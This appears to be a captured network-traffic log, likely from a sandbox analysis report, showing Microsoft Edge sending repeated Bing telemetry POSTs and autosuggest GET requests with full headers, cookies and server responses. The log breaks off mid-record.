https://www.bing.com/fd/ls/ls.gif?IG=5AD7030C91584719B4F5E41231459495&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306910514}&log=UserEvent

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/ls.gif?IG=5AD7030C91584719B4F5E41231459495&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306910514}&log=UserEvent HTTP/2.0
host: www.bing.com
content-length: 0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:40 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306920.7f1862b
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 654
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:40 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306920.7f1862c
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 270
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:40 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306920.7f1863c
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 668
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 415
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2bfa414fce9c43cc81e789c487
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-7ARxurMVZqESI9zp+VnrCYQ8gTNsN5BmKFfV+hABpRY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:43 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:43 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=29F07A9A6AC66C3237B06FD16B1B6DAA; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:43 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306923.7f19442
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 265
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 426
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2c0316491195a4da94f4f02093
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-SdEdeHMl+6U1I2hNuhAGE3KSza0/6Dpqg817Zk8pNeY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:44 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=175D18B5F723685E1F260DFEF6436938; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:44 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306924.7f19999
GET

https://www.bing.com/qbox?query=o&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=5cebc1b4bcac4fe0bc40691bed227a34&oit=1&cp=1&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=o&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=5cebc1b4bcac4fe0bc40691bed227a34&oit=1&cp=1&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 363
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2e8a144bc08e565227798e1d96
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-FGgw+TJDd9+4AZaXBD/tILNQbP6cUZj919rfdBZMzzQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:46 GMT
set-cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B; expires=Mon, 29-Dec-2025 10:08:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=SID=33452D5FBAEF6FFA2D103814BB046E2C; domain=.bing.com; path=/; HttpOnly
set-cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693; domain=.bing.com; expires=Mon, 29-Dec-2025 10:08:46 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306926.7f1a26e
GET

https://www.bing.com/qbox?query=on&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=f81094f58a89400c866d8e3fd782e110&oit=1&cp=2&pgcl=4

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /qbox?query=on&language=en-US&pt=EdgBox&cvid=00ce9ee6199e4a5db1785c0696c690a3&ig=f81094f58a89400c866d8e3fd782e110&oit=1&cp=2&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 246
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a2f0540429aa29125c19e50dcaf
